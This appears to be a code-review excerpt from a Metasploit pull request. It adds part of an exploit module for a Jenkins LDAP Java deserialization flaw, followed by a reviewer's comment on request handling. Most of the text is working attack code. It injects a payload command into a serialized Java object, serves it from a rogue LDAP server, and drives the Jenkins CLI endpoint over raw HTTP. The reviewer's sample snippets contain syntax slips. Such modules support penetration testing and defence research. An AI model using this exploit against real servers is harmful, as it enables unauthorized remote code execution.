modules/exploits/linux/misc/jenkins_ldap_deserialize.rb

```diff
@@ -0,0 +1,250 @@
+      URI(u)
+    rescue ::URI::InvalidURIError
+      print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
+      raise Msf::OptionValidateError.new(['TARGETURI'])
+    end
+  end
+
+  def normalize_uri(*strs)
+    new_str = strs * "/"
+
+    new_str = new_str.gsub!("//", "/") while new_str.index("//")
+
+    # Makes sure there's a starting slash
+    unless new_str[0,1] == '/'
+      new_str = '/' + new_str
+    end
+
+    new_str
+  end
+
+  def aseq(x, tag)
+    s = seq(x)
+    s.tag_class = :APPLICATION
+    s.tag = tag
+    s
+  end
+
+  def seq(x)
+    OpenSSL::ASN1::Sequence.new(x)
+  end
+
+  def int(x)
+    OpenSSL::ASN1::Integer.new(x)
+  end
+
+  def string(x)
+    OpenSSL::ASN1::OctetString.new(x)
+  end
+
+  def set(x)
+    OpenSSL::ASN1::Set.new(x)
+  end
+
+  def java_string(s)
+    length = s.length
+
+    packed_length = [length].pack("S>")
+
+    "#{packed_length}#{s}"
+  end
+
+  def make_stage2(command)
+    [STAGE2].pack("H*").gsub("\x00\x0Etouch /tmp/wtf", java_string(command))
+  end
+
+
+  def make_stage2_reply(command)
+    message_id = 3
+    java_class_name_attributes = seq([string("javaClassName"), set([string("WTF")])])
+    java_serialized_data_attributes = seq([string("javaSerializedData"), set([string(make_stage2(command))])])
+    attributes = seq([java_class_name_attributes, java_serialized_data_attributes])
+    s = seq([
+      int(message_id),
+      aseq([string("cn=wtf, dc=example, dc=com"), attributes], SEARCH_RES_ENTRY)])
+    s.to_der
+  end
+
+
+
+  def make_stage1(ldap_url)
+    [STAGE1].pack("H*").gsub("\x00\x15ldap://localhost:1234", java_string(ldap_url))
+  end
+
+
+  def read_ldap_packet(socket)
+
+    bytes = socket.read(2)
+    if bytes[0] != "0"
+      raise "NOT_LDAP: #{bytes.inspect} #{bytes[0]}"
+    end
+
+    length = bytes[1].ord
+    if (length & (1<<7)) != 0
+      length_bytes_length = length ^ (1<<7)
+
+      length_bytes = socket.read(length_bytes_length)
+      length = length_bytes.bytes.reduce(0) {|c, e| (c << 8) + e}
+    end
+
+    socket.read(length)
+  end
+
+
+  def write_chunk(socket, chunk)
+    socket.write(chunk.bytesize.to_s(16) + "\r\n")
+    socket.write(chunk)
+    socket.write("\r\n")
+  end
+
+  def exploit
+    uuid = SecureRandom.uuid
+
+    ldap_port = datastore["SRVPORT"]
+    ldap_host = datastore["SRVHOST"]
+    ldap_external_host = datastore["LDAPHOST"]
+
+    command = payload.encoded
+    host = datastore["RHOST"]
+
+    ldap = TCPServer.new(ldap_host, ldap_port)
+
+    cli_path = normalize_uri(target_uri.path, "cli")
+
+    begin
+
+      download = connect()
+
+      begin
+
+        download.write("POST #{cli_path} HTTP/1.1\r\n" +
+          "Host: #{host}\r\n" +
+          "User-Agent: curl/7.36.0\r\n" +
+          "Accept: */*\r\n" +
+          "Session: #{uuid}\r\n" +
+          "Side: download\r\n" +
+          "Content-Length: 0\r\n" +
+          "Content-Type: application/x-www-form-urlencoded\r\n\r\n")
+
+        download.read(20)
```

Comment:
@notivan There is nothing in the HTTPClient object that is preventing you from fire and forget. If you don't care for the response, you can generate the request through either send_request_raw or send_request_cgi. The reason why we care for the response is to make sure that the request actually hit the intended target. That is why we do:
```ruby
res    = send_request_cgi({
method = 'POST'
uri    = normailze_uri(target_uri.path)
})
if res and res.code
<snip>
```
We can certainly do:
```ruby
send_request_cgi({
method      = 'POST'
uri         = normalize_uri(target_uri.path)
})
<initialize the ldap client here
```
Checking the response is to make sure if the attacker machine can at least reach the target or if there is a Jenkins service running or not.